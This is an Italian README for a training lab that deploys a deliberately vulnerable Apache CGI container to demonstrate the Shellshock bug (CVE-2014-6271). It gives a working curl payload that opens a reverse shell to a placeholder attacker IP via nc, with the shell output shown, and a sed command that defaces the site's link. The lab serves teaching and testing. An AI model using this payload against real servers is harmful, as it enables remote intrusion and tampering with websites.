
Questo repository è un ambiente PoC di CVE-2014-6271(https://nvd.nist.gov/vuln/detail/cve-2014-6271).
Questo repository è un ambiente PoC di CVE-2014-6271.
Puoi distribuire un servizio web che include la vulnerabilità utilizzando l'immagine contenitore apache2.
Costruisci l'immagine insicura dal Dockerfile.
# docker build -t cve-2014-6271-apache-debian:buster ./insecure-base-image/
# docker build -t training-website-poc:v1.0 ./web-insecure/
Docker
Distribuisci il contenitore PoC come contenitore Docker.
# docker run -d -p 8080:80 training-website-poc:v1.0
Kubernetes
Distribuisci il contenitore PoC come pod e servizio k8s.
# kubectl apply -f web-insecure/k8s-manifest/web-insecure-pod.yml
# kubectl apply -f web-insecure/k8s-manifest/web-insecure-svc.yml
Una volta completata la distribuzione, puoi consultare la pagina web accedendo al seguente URL con un browser.
Puoi accedere all'ambiente di laboratorio k8s facendo clic sul link "Click!" nella parte inferiore della pagina web.
Docker
http://<docker host IP>:8080
Kubernetes
http://<k8s service endpoint>:<k8s service port>
In questa demo, puoi modificare la pagina web dall'host attaccante (all'esterno del contenitore) sfruttando la vulnerabilità di CVE-2014-6271.
Esegui questi comandi dall'host attaccante.
Terminale 1
# nc -nvlp 5050
Terminale 2
※In questo caso, distribuiamo il contenitore PoC usando Docker. Nel caso di Kubernetes, l'URL dovrebbe essere http://<k8s service endpoint>:<k8s service port>.
# curl -H "user-agent: () { :; }; echo; /bin/nc -e /bin/bash <Attacker Host IP> 5050" http://<docker host IP>:8080/cgi-bin/vulnerable
Dopo di che, puoi vedere che /bin/bash del contenitore PoC può essere eseguito nel terminale 1.
Listening on 0.0.0.0 5050
Connection received on 172.17.0.2 38926
id
uid=33(www-data) gid=33(www-data) groups=33(www-data),1000(wheel)
pwd
/usr/lib/cgi-bin
Modifica il link "Click!" della pagina web.
In questo caso, usiamo una pagina fittizia per il link dannoso.
sudo sed -i -e 's/https\:\/\/www.katacoda.com\/courses\/kubernetes/danger.html/' /var/www/html/index.html
Accedi nuovamente alla pagina web e fai clic sul link "Click!" nella parte inferiore della pagina web.
http://<docker host IP>:8080
https://github.com/hmlio/vaas-cve-2014-6271
https://github.com/opsxcq/exploit-CVE-2014-6271